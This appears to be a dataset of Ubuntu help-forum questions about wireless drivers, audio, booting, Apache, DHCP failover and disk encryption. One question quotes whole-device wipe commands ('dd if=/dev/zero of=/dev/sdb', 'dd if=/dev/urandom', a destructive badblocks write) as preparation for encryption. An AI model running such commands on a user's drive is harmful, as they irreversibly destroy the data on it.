433930	can not get wireless to work after installing ubuntu 12.04	my hard drive crashed that was running win8 so i installed ubuntu 12.4 on my hdd . i can connect to wired connection but no wireless . i have checked drivers and they seem good . can anyone tell me what i 'm missing here ? damulag @ damulag-satellite-s55-a : ~ $ sudo lshw -class network [ sudo ] password for damulag : *-network unclaimed description : network controller product : rtl8188ee wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : c2400000-c2403fff *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 10 serial : 54 : be : f7:49 : db:2b size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=10.0.0.6 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:18 memory : c1000000-c103ffff ioport:2000 ( size=128 ) damulag @ damulag-satellite-s55-a : ~ $ ifconfig eth0 up siocsifflags : operation not permitted damulag @ damulag-satellite-s55-a : ~ $ sudo lshw -class network *-network unclaimed description : network controller product : rtl8188ee wireless network adapter vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:3000 ( size=256 ) memory : c2400000-c2403fff *-network description : ethernet interface product : qca8171 gigabit ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 10 serial : 54 : be : f7:49 : db:2b size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=10.0.0.6 latency=0 link=yes multicast=yes port=twisted pair speed=1gbit/s resources : irq:18 memory : c1000000-c103ffff ioport:2000 ( size=128 ) damulag @ damulag-satellite-s55-a : ~ $
433938	can not write bytes broken pipe	i ca n't seem to boot ubuntu 12.04 on my t-61 thinkpad . i get the splash screen , then a black screen that reads : can not write bytes : broken pipe . let me first say that originally i had removed xserver-xorg-video-mach64 ( because i have an intel video card ) xserver-xorg-core , and other similar packages that i thought were extraneous . after doing this , i would get the black screen but it would say something about plymouth and freeze . so then i reinstalled all the xserver packages i removed by installing xserver-xorg-video-all . this is when i got the current error message : can not write bytes : broken pipe please be verbose with your answers , as i am not that knowledgeable about linux thanks for the help
433940	tab does n't auto complete on user `` minecraft '' but completes with root	on my user `` minecraft '' whenever i hit the tab key it just indents instead of auto completing . it works fine on root though . output of getent passwd minecraft : minecraft : x:1001:1001 : :/home/minecraft : /bin/sh
433943	how to clean executable using make clean ?	after compiling several *.c and *.h files using make , i cleaned up the object files using make clean . however i do n't know how to remove the executable . my makefile code -- > cc=gcc cflags=-i . mp1 : main.o downloader.o json.o $ ( cc ) -o mp1 main.o downloader.o json.o -i . .phony : clean clean : -rm *.o $ ( objects )
433945	xbmcbuntu install wo n't proceed	this question is about xbmcbuntu , hope that 's ok . i 'm trying to install it on my computer now for a while ( hope to make it a htpc/server ) but i just ca n't get it to work . here 's my hardware configuration : motherboard msi fm2-a75ma-e35 cpu : amd a6 5600k 8 gb of memory onboard video crucial 64 gb ssd ( formatted in fat ) wd red 3 tb harddrive ( want to run windows home server in virtualbox ) 350 watt psu now i 've been trying to install it using usb using linuxlive usb creator , unetbootin , universial usb installer , yumi and regular dvd with iso but all do n't work . ( i set the bootorder configuration right ) my motherboard boots properly , displaying the usual stuff and after that i get to the installmenu of xmbcbuntu . here i can choose whatever i want but all i get after selecting an option is a white screen . i tried to adjust the installation using tab with removing quiet splash and adding nomodeset ( i guess in case my onboard video driver does n't get supported ) . all i get is a long list with all kids of information ending with acpi : core revision 20120320 . also tried all of the options above with the regular version of ubuntu ( 12.04 ) but face the same problem . does anyone know what i am doing wrong and how to proceed ? thanks !
433949	what is the recommended release of ubuntu for 32-bit intel based macs ?	what is the recommended release of ubuntu for 32-bit intel based macs ? i see for 13.10 that there are specialised images for macs , ( e.g . ubuntu-13.10-desktop-amd64+mac.iso ) . these only support 64-bit , and there is nothing similar for the i386 images . looking at older versions such as 12.04 lts , there are no mac variants at all . i have tried using the regular 12.04 i386 image to create a bootable usb stick , but i was not able to boot the macbook using this . only the macintosh hard disk appeared in the boot menu options . i do not need to keep mac os x on the macbook and would be happy single booting ubuntu . not sure if that makes things easier or harder .
433951	13.10 fully installed reset and operating system does not boot	my system boots and searches for my operating system and nothing happens . i can run it from a cd just fine . i have tried loading it twice and once on a clean hard drive .
433959	cursor positioning using mouse in bash possible ?	in vim i can actually position the cursor in insert-mode using the mouse . so i assume this should ( technically ) also be enable-able for the bash . is it possible ? this would be quite useful at times when small changes have to be made to very long commands . ( i am using fish actually , but i guess referring to bash i reach a wider audience . )
433961	is there such a thing as the `` go live '' for lts pre-release builds of ubuntu ?	for certain pre-release builds of software products it is guaranteed that they can be used already in production - and more importantly can be upgraded to the final version . is there such a thing for ubuntu 's lts versions ? alternatively , do you have any guidance for the scenario described below . i want to set up a new ubuntu server and would like to start preparations for this right now . does it make sense to use the daily build before the release and set it up already , despite potential bugs ? will the system be equivalent to a freshly installed system after the final release , if i run apt-get dist-upgrade ? or would i have to start over anyway ? obviously i would prefer not to use 12.04.4 right now and then upgrade to 14.04 in a month . instead it seems to make sense to start with a daily build . but can it be upgraded to the final release version ?
433962	can not enter password	am new at ubuntu i tried to install a kdeplasmadesktop addons , and by typing su -c 'yum update kdeplasma-addons ' from the terminal it ask for password but can not type any in . thanks .
433966	installing nvidia drivers on thinkpad w530	i am on a thinkpad w530 and have just installed ubuntu . which one of these drivers do i install ? does the command sudo apt-get install nvidia-current install current drivers ? edit : i used sudo apt-get install nvidia-current and now there is a nvidia_304 driver activated in additional drivers : if you have optimus enabled in the bios , you either have to disable it or install bumblebee
433970	ubuntu 12.10 wo n't install to computer and creates loop ?	so , recently , i have been using ubuntu in vmware and now have decided to do the real thing . so , i created a usb boot able install . when i load it up , it loads fine . then i select install ubuntu . it says the `` recommended settings '' and i choose whether i want to install it along side windows or not . i want to install along side windows ( i have windows 7 ) , so i click that . then , it restarts and it just takes me back into the `` would you like to try or install ubuntu ? '' again . i have tried this many times and the same thing keeps happening . anyone have any suggestions ?
433972	printer problem with ubuntu 13.10	i am sharing an hp 7610 printer on two apple computers , one windows xp computer and one ubuntu 13.10 computer . from the ubuntu computer only , before a document prints two copies of some kind of status report on the printer prints . this wastes two sheets of paper for every print command . so far hp has not been able to solve the problem . it started after a regular update from the ubuntu software updater . any ideas would be appreciated . the printer is shared through an lan . it is hard wired to the linux machine through the router . the report being printed is as follows : media limits : 0.13 x 0.13 to 8.37 x 10.87 inches job id : officejet_7610-105 driver : ho-officejet_7610_series.ppd driver version : 3.14.1
433973	ubuntu 13.10 on lenovo thinkpad edge : suddenly no audio anymore	all of a sudden i do n't hear any audio anymore on my lenovo thankpad edge e535 . stefan @ thinkpad-e535 : ~ $ lsb_release -d description : ubuntu 13.10 stefan @ thinkpad-e535 : ~ $ uname -r 3.11.0-18-generic stefan @ thinkpad-e535 : ~ $ cat /proc/asound/cards 0 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xf0344000 irq 49 1 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xf0340000 irq 16 29 [ thinkpadec ] : thinkpad ec - thinkpad console audio control thinkpad console audio control at ec reg 0x30 , fw unknown stefan @ thinkpad-e535 : ~ $ aplay -l **** liste der hardware-geräte ( playback ) **** karte 0 : hdmi [ hda ati hdmi ] , gerät 3 : hdmi 0 [ hdmi 0 ] sub-geräte : 0/1 sub-gerät # 0 : subdevice # 0 karte 1 : generic [ hd-audio generic ] , gerät 0 : cx20590 analog [ cx20590 analog ] sub-geräte : 1/1 sub-gerät # 0 : subdevice # 0 stefan @ thinkpad-e535 : ~ $ aplay /usr/share/sounds/alsa/noise.wav wiedergabe : wave '/usr/share/sounds/alsa/noise.wav ' : signed 16 bit little endian , rate : 48000 hz , mono stefan @ thinkpad-e535 : ~ $ lspci -nnk | grep -ia2 audio 00:01.1 audio device [ 0403 ] : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller [ 1002:9902 ] subsystem : lenovo device [ 17aa:5100 ] kernel driver in use : snd_hda_intel -- 00:14.2 audio device [ 0403 ] : advanced micro devices , inc. [ amd ] fch azalia controller [ 1022:780d ] ( rev 01 ) subsystem : lenovo device [ 17aa:5100 ] kernel driver in use : snd_hda_intel stefan @ thinkpad-e535 : ~ $ ps -c esd pid tty time cmd stefan @ thinkpad-e535 : ~ $ ps -c arts pid tty time cmd stefan @ thinkpad-e535 : ~ $ ps -c pulseaudio pid tty time cmd 1524 ? 00:00:18 pulseaudio stefan @ thinkpad-e535 : ~ $ grep `` ^audio '' /etc/group | grep `` $ user '' | wc -l 0 stefan @ thinkpad-e535 : ~ $ lsmod | grep `` snd '' snd_hda_codec_conexant 57441 1 snd_hda_codec_hdmi 41154 1 snd_hda_intel 52267 7 snd_hda_codec 188738 3 snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_hda_intel snd_hwdep 13602 1 snd_hda_codec snd_pcm 102033 4 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18710 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30095 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29433 2 snd_pcm , snd_seq snd 69141 25 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_conexant , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , thinkpad_acpi , snd_seq_device , snd_seq_midi soundcore 12680 1 snd stefan @ thinkpad-e535 : ~ $ head -n 3 /proc/asound/card0/codec # 0 codec : ati r6xx hdmi address : 0 afg function id : 0x1 ( unsol 0 ) stefan @ thinkpad-e535 : ~ $ head -n 3 /proc/asound/card0/codec97 # 0/ac97 # 0-0 head : »/proc/asound/card0/codec97 # 0/ac97 # 0-0“ kann nicht zum lesen geöffnet werden : datei oder verzeichnis nicht gefunden stefan @ thinkpad-e535 : ~ $ head -n 3 /proc/asound/card0/codec97 # 0/ac97 # 0-0+regs head : »/proc/asound/card0/codec97 # 0/ac97 # 0-0+regs“ kann nicht zum lesen geöffnet werden : datei oder verzeichnis nicht gefunden stefan @ thinkpad-e535 : ~ $ cat ~/.asoundrc cat : /home/stefan/.asoundrc : datei oder verzeichnis nicht gefunden stefan @ thinkpad-e535 : ~ $ cat ~/.asoundrc.asoundconf cat : /home/stefan/.asoundrc.asoundconf : datei oder verzeichnis nicht gefunden stefan @ thinkpad-e535 : ~ $ cat /etc/asound.conf cat : /etc/asound.conf : datei oder verzeichnis nicht gefunden stefan @ thinkpad-e535 : ~ $ tried several things incl . removing alsa settings file /var/lib/alsa/asound.state , but without any result . does anybody have a clue what the root cause may be here ? thanks ! any ideas ?
433974	help with ffmpeg issue ; â [ swscaler @ 0xa314080 ] warning : data is not aligned ! this can lead to a speedlossâ	related to ; http : //superuser.com/questions/725581/create-a-screencast-with-ffmpeg-how-to-keep-videoaudio-in-sync/728739 ? noredirect=1 # comment934589_728739 and ; http : //http : //superuser.com/questions/728795/new-ffmpeg-swscaler-0xa314080-warning-data-is-not-aligned-this-can-lead ? lq=1 ffmpeg version 2.2.git copyright ( c ) 2000-2014 the ffmpeg developers built on mar 13 2014 16:08:45 with gcc 4.8 ( ubuntu/linaro 4.8.1-10ubuntu9 ) produces an error '' [ swscaler @ 0xa314080 ] warning : data is not aligned ! this can lead to a speedloss '' the end result is a serious a/v sync issue , with the video as if it 's in fast-forward . has anyone encountered this problem ? any ideas for solutions ? the goal is screencasting ; ffmpeg -f alsa -ac 2 -i hw:2,0 -f x11grab -r 30 -s 1920x1072 -i :0.0 -acodec libmp3lame -ab 320k -sameq /media/username/library-portable/video-studio/transfer-bin/btsvlog02.avi ffmpeg version 2.2.git copyright ( c ) 2000-2014 the ffmpeg developers built on mar 13 2014 16:08:45 with gcc 4.8 ( ubuntu/linaro 4.8.1-10ubuntu9 ) configuration : -- prefix=/home/username/ffmpeg_build -- extra-cflags=-i/home/username/ffmpeg_build/include -- extra-ldflags=-l/home/username/ffmpeg_build/lib -- bindir=/home/username/bin -- extra-libs=-ldl -- enable-gpl -- enable-libass -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopus -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-libx264 -- enable-nonfree -- enable-x11grab libavutil 52 . 66.101 / 52 . 66.101 libavcodec 55 . 52.102 / 55 . 52.102 libavformat 55 . 34.101 / 55 . 34.101 libavdevice 55 . 11.100 / 55 . 11.100 libavfilter 4 . 3.100 / 4 . 3.100 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 18.100 / 0 . 18.100 libpostproc 52 . 3.100 / 52 . 3.100 option 'sameq ' was removed . if you are looking for an option to preserve the quality ( which is not what -sameq was for ) , use -qscale 0 or an equivalent quality factor option . failed to set value '1 ' for option 'sameq ' : invalid argument error parsing global options : invalid argument used to work . -- -added/updated monday , march 17th , 2014 -- - ffmpeg -f alsa -ac 2 -i hw:2,0 -f x11grab -r 30 -s 1920x1080 -i :0.0 -acodec libmp3lame -ab 320k /media/username/library-portable/video-studio/transfer-bin/btsvlog03.avi ffmpeg version 2.2.git copyright ( c ) 2000-2014 the ffmpeg developers built on mar 13 2014 16:08:45 with gcc 4.8 ( ubuntu/linaro 4.8.1-10ubuntu9 ) configuration : -- prefix=/home/username/ffmpeg_build -- extra-cflags=-i/home/username/ffmpeg_build/include -- extra-ldflags=-l/home/username/ffmpeg_build/lib -- bindir=/home/username/bin -- extra-libs=-ldl -- enable-gpl -- enable-libass -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopus -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-libx264 -- enable-nonfree -- enable-x11grab libavutil 52 . 66.101 / 52 . 66.101 libavcodec 55 . 52.102 / 55 . 52.102 libavformat 55 . 34.101 / 55 . 34.101 libavdevice 55 . 11.100 / 55 . 11.100 libavfilter 4 . 3.100 / 4 . 3.100 libswscale 2 . 5.101 / 2 . 5.101 libswresample 0 . 18.100 / 0 . 18.100 libpostproc 52 . 3.100 / 52 . 3.100 guessed channel layout for input stream # 0.0 : stereo input # 0 , alsa , from 'hw:2,0 ' : duration : n/a , start : 1395098882.312775 , bitrate : 1536 kb/s stream # 0:0 : audio : pcm_s16le , 48000 hz , stereo , s16 , 1536 kb/s [ x11grab @ 0x9ea2c20 ] device : :0.0 - > display : :0.0 x : 0 y : 0 width : 1920 height : 1080 [ x11grab @ 0x9ea2c20 ] shared memory extension found input # 1 , x11grab , from ':0.0 ' : duration : n/a , start : 1395098882.360550 , bitrate : 1990656 kb/s stream # 1:0 : video : rawvideo ( bgr [ 0 ] / 0x524742 ) , bgr0 , 1920x1080 , 1990656 kb/s , 30 tbr , 1000k tbn , 30 tbc output # 0 , avi , to '/media/username/library-portable/video-studio/transfer-bin/btsvlog03.avi ' : metadata : isft : lavf55.34.101 stream # 0:0 : video : mpeg4 ( fmp4 / 0x34504d46 ) , yuv420p , 1920x1080 , q=2-31 , 200 kb/s , 30 tbn , 30 tbc stream # 0:1 : audio : mp3 ( libmp3lame ) ( u [ 0 ] [ 0 ] [ 0 ] / 0x0055 ) , 48000 hz , stereo , s16p , 320 kb/s stream mapping : stream # 1:0 - > # 0:0 ( rawvideo - > mpeg4 ) stream # 0:0 - > # 0:1 ( pcm_s16le - > libmp3lame ) press [ q ] to stop , [ ? ] for help [ swscaler @ 0x9e81080 ] warning : data is not aligned ! this can lead to a speedloss [ alsa @ 0x9e98d00 ] alsa buffer xrun.743kb time=00:00:00.13 bitrate=45644.2kbits/s [ alsa @ 0x9e98d00 ] alsa buffer xrun.1067kb time=00:00:01.70 bitrate=5131.9kbits/s [ alsa @ 0x9e98d00 ] alsa buffer xrun.2175kb time=00:00:05.95 bitrate=2994.1kbits/s [ alsa @ 0x9e98d00 ] alsa buffer xrun.5550kb time=00:00:17.68 bitrate=2570.6kbits/s frame= 580 fps=9.9 q=31.0 lsize= 6540kb time=00:00:50.28 bitrate=1065.5kbits/s video:6433kb audio:34kb subtitle:0 data:0 global headers:0kb muxing overhead 1.125390 % received signal 2 : terminating . same results *note , the ffmpeg issue mostly likely is a ubuntu issue . i 'm on kubuntu 13.10 . there has been a split in the ffmpeg community and the ubuntu group ended up on the side that left the ffmpeg project .
433976	mounting and shared folder between guest machine and win 7 host	i am experiencing a problem i already shared a folder named `` virtual_share '' on win7 and mount it on my oracle virtual box on ubuntu with the same name . but i can not copy anything to the shared folder on the machine it says permission denied.but anything from this shared folder can be copied.i already installed the vbox additions and also tried to change the folder permissions using chmod .
433977	how to install ubuntu on separated flash drives ?	i need to install a single version of ubuntu on 2 usb flash drives , what is the best partitioning scheme to use for this situation ? all i want to do on the flash drives are play minecraft , and use for minimal everyday things . the current on i want to use is /dev/sda = / 8 gb ( my root ) /dev/sdb = /usr 8 gb ( for my programs to install )
433979	keys how @ , shift , $ , % dont work	i have a samsung rv411-bd4br notebook , and i have recently installed ubuntu 13.10 but the keys @ , $ , and % do n't work . my current layout is abnt2 , portuguese brazil .
433983	`` this is not a bootable disc ... '' when installing on a macbook air 13 6,2 with usb	goal : single boot ubuntu with no mac os x installed . for dual booting there is no problem - use refind . i tried the following iso 's ( all x64 ) : 12 . 10/13 . 10/14 . 04 and the corresponding mac versions and it seems there is no bootloader after installation , the mac version wo n't even boot into the ubuntu livecd . also , i tried all sort of settings with boot-repair with no success . recap : when booting from a mac iso a `` boot error '' message or `` this is not a bootable disc ... '' error is encountered . when booting from regular desktop iso the installation is successful but the os itself is unbootable . has anyone have this to run ?
433984	how can i have multiple apache sites under the same domain ?	i have a single ip that is external - say xx.xx.xx.xx . currently , i have 2 urls that resolve to the ip address . i use virtual hosts within apache to make sure that the right requests go to the site : www.mysite1.com -- > /home/mysite1 www.mysite2.com -- > /home/mysite2 works great . however ... i want to add a 3rd ( and then 4th and 5th , etc ) site to this ip . the sites are temporary and thus wo n't get domain names . i was hoping to access them by using : http : //xx.xx.xx.xx/mysite3 where mysite3 -- > /home/mysite3 but it seems that the virtual host from site1 catches these requests and routes the request to www.mysite1.com which struggles finding the files ( mysite3 ) so i get the www.mysite1.com with 404 page ( they are all wordpress sites ) . i am sure that this can be done but i am just as sure i ca n't figure it out . does anyone have an idea of how i need to configure `` things '' ?
433985	no keyboard response in applications due to permissions of /.config/ibus/bus	i was running into an error using the android sdk -- the error message was : the owner of /home/ [ username ] /.config/ibus/bus is not root ! so , like a moron i did a sudo chown root : root /bus command . now , i can type in the search bar , but not in any application ( including terminal ) . any way to fix this permission ?
433987	isc-dhcp-server ( primary/secondary ) - can load balancing be disabled ?	when i was hired at my company , i quickly determined that one of my highest priority projects would be to improve our ancient dns/dhcp setup . it was running on an ubuntu-based workstation-grade server that was more than 7 years old , and was in serious danger of keeling over . so , i started researching options for adding fault tolerance . i ended up building a standard ubuntu server 12.04.3 lts 64-bit isc dhcp failover cluster with a primary and secondary server , utilizing load balancing . the way things currently work , if my dhcp range consists of 54 ips , the 2 servers split the ip pool evenly ( 27 each ) while remaining in constant communication with one another . if one of the servers goes down for more than an hour without getting put into a partner-down state , my life then becomes hell . i 've since come to realize that the load balancing aspect is overly complex , and very unnecessary for our small shop . unfortunately , i 've been unable to find any documentation on how to create a simple primary/secondary relationship , whereby the secondary will take over all responsibilities in the event the primary experiences a failure ( it would ideally function as a hotspare ) . does this functionality exist within isc-dhcp-server v4.1.esv-r4-0ubuntu5.6 ? if so , how in the world is it configured ? i 've seen mention of things such as `` split 256 '' ( as opposed to the `` split 128 '' i 'm currently using ) , but i ca n't find anything to definitively confirm this . if the convoluted load balancing feature is a requirement for fault tolerance , then so be it . also , a quick note that i 'm more of a windows admin than a linux admin , so please be gentle : p thanks , -snipe
433990	narrowing down hardware choices	i 've finally had it with my old hp tower . the ubuntu installer does n't recognize its internal hard drive . it does n't even allow me to run 64-bit vms . ideally , i 'd like to be able to walk into best buy , look at a row of towers and pick one i can be reasonably certain will run desktop 13.10 , but i 'm having a hard time correlating the entries on the ubuntu desktop certified hardware list with the specifications listed in retail environments ( including retail websites . ) even something as basic as a model number seems to be obscured . are there quick and dirty guidelines for looking at a commodity system and eliminating or considering it ubuntu-ready ?
433995	computer missing firmware ?	i have an imac g5 that i 'm looking to install ubuntu , kubuntu , etc , and release of ubuntu on to . whenever i try to install any version ( i 've only tried 12.04 and above ) , i install the os without errors , but when i restart after installation , i get an error that told me to go to wireless.kernel.org/en/users/drivers/b34 # devicefirmware . again , this works with every ubuntu release i 've tried on this specific computer . i have , although , successfully installed ubuntu 12.04 on a mac mini g4 , which works entirely fine , which is confusing , because i had no need to install firmware on that , yet i have to install seemingly new firmware on a computer that is older . this imac runs on a ppc processor , so it 's probably no longer supported . by the way , i 'm completely and totally new to ubuntu , and i probably have no idea what i 'm doing . i needed to switch to something other than os x because neither of my 2 semi-old macs seem to co-operate with os x very well . my mac mini is fine , but this imac g5 will not stop giving me issues . i 'd really appericate any help that anyone out there might have . thanks in advance .
433997	how to run/use popcorn-time ?	i got popcorn time installed using this link : install popcorn time but i have no clue how to use or run popcorn time . do i open my torrent client and download a movie and then it gets going ? or do i have to open it ? if i have to open it , how do i do that , i opened the dash and tried clicking on it but nothing happened . please help me ! ! : d
433998	apache 2 not restarting	hi i am having trouble restarting apache , i get the error ( 99 ) can not assign requested address : make_sock : could not bind to address 58.108.248.95:80 no listening sockets available , shutting down unable to open logs action 'start ' failed . the apache error log may have more information . when i run the command sudo netstat -ltnp | grep ':80' this is what i get : tcp 0 0 127.0.0.1:8080 0.0.0.0 : * listen 2320/python if i clear the port using sudo kill -9 2320 and then restart apache2 i still get the same error if anyone has any info it would be greatly appreciated ! ! !
434002	can not control display brightness with hp probook 4545s ( radeon hd7420g ) - ubuntu 13.10	i need help because the notebook is always running at maximum light . 8 ( this hp probook 4545s has amd radeon hd 7420g ( hd7500m/7600m series ) graphics and the video driver for the amd graphics accelerators from fglrx-updates is activated , running with ubuntu 13.10 ( 64bit ) . first situation : fn-brightness keys make the osd display for brightness show up and i can change the bar , but the brightness does not change . i found a similar problem here multimedia keys are not working with my hp probook 4540s and tried the given solution by changing a grub setting – grub_cmdline_linux= '' acpi_backlight=vendor '' – but it does not help . now the brightness key have just no effect . another similar problem here can not change brightness setting using function buttons or using the brightness control bar on hp laptop and an answer suggesting to use echo $ number > > /sys/class/backlight/intel_backlight/brightness to manually change the brightness – but the /sys/class/backlight/ directory is empty here . the official hp forum here http : //h30434.www3.hp.com/t5/notebook-display-and-video/can-t-change-brightness-and-contrast-on-my-hp-probook-4530s/td-p/812113 shows a complete lack of solutions . any other ideas that might help ? ps : the wifi button does not work either , but that 's not a big problem ( for me ) .
434004	change default scale method setting for kde wallpapers	i wish to change the default scaling method for the desktop wallpaper in kde ( more specifically kubuntu ) by editing the configuration file kde uses to fill in those defaults on a fresh install . so that , when any new account is created , or someone is installing the os , it is set to scaled & cropped instead of zoomed or scaled . i know that gnome has this default setting stored in , /usr/share/gnome-background-properties/ubuntu-wallpapers.xml or in , /usr/share/gconf/schemas/desktop_gnome_background.schemas i have been searching the linux filesystem for a couple days know to find the kde equivalent of the files listed above , but with no luck . i have thoroughly search '/usr/share/kununtu-default-settings ' but there does n't seem to be any configuration file for the wallpaper settings listed there . at this point i am assuming another program , not built into kde , is handling the wallpaper , i do n't know how to determine this though .
434006	unable to see my windows drives	blkid shows the following swethamadhu @ mypc : ~ $ sudo blkid /dev/sda1 : label= '' system reserved '' uuid= '' 8e82d4c182d4af49 '' type= '' ntfs '' /dev/sda2 : label= '' myos '' uuid= '' 9812314912312e1e '' type= '' ntfs '' /dev/sda3 : label= '' mydata '' uuid= '' 0c76d84876d833e4 '' type= '' ntfs '' /dev/sda5 : uuid= '' 0bac628e-f3a7-4b01-a2d3-e93504d3b5bb '' type= '' ext4 '' /dev/sda6 : uuid= '' d9fcd4e0-54db-46f5-9fc1-b7dd3326c2a9 '' type= '' swap '' and swethamadhu @ mypc : ~ $ sudo vol_id -- uuid /dev/sda3 sudo : vol_id : command not found do suggest me what next ? the problem is i am unable to see my windows drives which were shown in home earlier before some auto updates . thanks
434007	lubuntu 13.10 autostart file ignored ?	when i reboot my computer and log in , my .config/lxsession/lubuntu/autostart file is completely ignored , according to the timestamp provided by `` ls -ul '' . in lxsession-default-apps , on the autostart tab , `` disable autostart applications ? '' says `` no '' . in the desktop.conf file , i also find `` disable_autostart=no '' . how do i get lubuntu to at least look at autostart ? or is the timestamp misleading ?
434008	how good is linux encrypted file system ?	i am using xubuntu 12 . i just used palimpsest to encrypt my external harddisk and it seems cool . but i am wondering how easy it is for someone to crack my harddisk using any tools available . and one more thing , https : //help.ubuntu.com/community/encryptedfilesystemsonremovablestorage asks us to do the following commands to make cracking difficult . sudo dd if=/dev/zero of=/dev/sdb bs=4k or sudo badblocks -c 10240 -s -w -t random -v /dev/sdb or sudo dd if=/dev/urandom of=/dev/sdb bs=4k so can this be done after i have created the encrypted partition . like my device is sdb and the encrypted partition is sdb1 . so how should i go about these commands . sudo dd if=/dev/zero of=/dev/sdb1 bs=4k and how does random , or adding zero makes it difficult to crack .
434009	recovering windows files through ubuntu	i am using ubuntu after my windows 7 has crashed . can i recover all of my files by navigating to the `` windows 7 os '' tab under devices and just moving everything over to the external ? which folders and files am i looking to move to get all of them ? thanks .
434011	ssh dynamic socks server running in the system is not accessible from outside	i have an infrastructure hotspot setup on my ubuntu machine using ap-hotspot . i connect to this hotspot from my android phone and am able to access the internet through this . now , i have a ssh dynamic socks server running on my ubuntu machine . locally , in the ubuntu machine , i am able to set this as the proxy server in firefox and am able to connect to the internet through the remote machine . i wanted to connect to this socks server from my android as a proxy server . the ip address of my ubuntu machine is 192.168.xxx.xxx and the dynamic socks server was running on port yyyy . so , in firefox for android , i set the socks proxy server as 192.168.xxx.xxx and socks proxy port yyyy . but , when i try to load any page , firefox for android just says that the proxy server is not reachable . to make sure that the port is not blocked , i started up a simple python http server on the same port yyyy and this was accessible from the android phone . now i am at a loss at what else to do . can someone explain , where i am going wrong here ?
434012	how to i connect huawei dongle to my ubuntu 12.4 version ?	i have purchased hp pavilion laptop.then i bought huawei vodafone dongle and connect to my laptop it would not connected to my laptop.i had installed ubuntu 12.4 version.how to i will connect this dongle to my laptop ?
434015	chromium 32.0.1700.107 ubuntu 12.04 , sqlite3 database ?	in chromium 32.0.1700.107 ubuntu 12.04 , i ca n't locate the directory in sqlite3 database ? any one can help me .
434016	how i can reset all of desktop configuration without reinstall it ?	excuse me , i have some duty from my teachers to make tutorial video by records how to change and setting desktop configuration . the problem is , i have been setting all my desktop configuration . is that any way to reset it without reinstall ? thanks before
434021	installation of mts mblaze zte dongle fails on ubuntu 13.10	when i try to run the install script provided by the dongle for drivers , it starts fine but at the end it aborts the process stating the following error : compilation terminated . `` smp_lock.h was not found '' . what could be the problem ? please help .
434023	buzzing from my speakers when idle lenovo y410p	i have a buzzing constantly from my speakers when no sound is being played . if i open sound settings , the speakers pop and then they are silent . ( i do n't even have to mess with any of the settings . ) once i exit , the speakers pop again and then the buzzing comes back . if i have anything that plays sound on , the buzzing goes away . i know others have tried turning off automute . i have tried turning off automute in alsamixer but the buzzing does not go away . i am using a lenovo y410p . two sound cards show up in alsa mixer : hda intel mid and hda intel pch : edit : i should also note that in alsamixer , for sound card 0 [ mid ] i do not have any options for volume control . i only have these in alsamixer for sound card 1 [ pch ] . audio devices : cat /proc/asound/cards 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xc2610000 irq 49 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xc2614000 irq 50 sound card information from the terminal can be found here : my google doc new discovery : when my computer is plugged in and i adjust any setting of the volume ( mute , unmute , volume up , volume down ) , the buzzing goes away . as soon as i unplug my computer , the speakers pop and the buzzing comes back . when i plug the computer in , with the speakers buzzing , the buzzing continues until i adjust any setting of the volume ( mute , unmute , volume up , volume down ) . then the buzzing goes away . this suggests to me that `` auto-mute disabled '' is being overridden on battery power . it seems like auto-mute is activating on battery power regardless of whether or not i have auto-mute disabled . am i off-base for thinking this ? i do n't think this is an electrical issue , since i am dual booting windows and have no such problem with windows . edit : sunday march 16 , 2014 thanks to onecoder4u for pointing out that the buzzing only happens when the keyboard back-lighting is on dim , but not when keyboard back-lighting is off or on high . ok , i can live with not having my keyboard on dim . this solves the buzzing but not the popping issue . i still get a loud pop from my speakers whenever the computer switches between playing sound and not playing sound . i have no issues at all when my computer is plugged in . i would mark this question as answered , but i am still having part of the problem .
434025	non-system disk error '' or `` disk error '' appears on black screen	i am trying to install ubuntu 12 . 04 server on my old 2002 hp 268900-999 desktop . i made a start up usb using the live disk creator in ubuntu 13 . 10 . i set the computer to boot to usb first in the bios but when i boot i get a non-system disk error '' or `` disk error '' appears on black screen . the usb drive is the only usb device connected to the machine ( apart from a keyboard and a mouse ) and it works on a different computer , what am i doing wrong ?
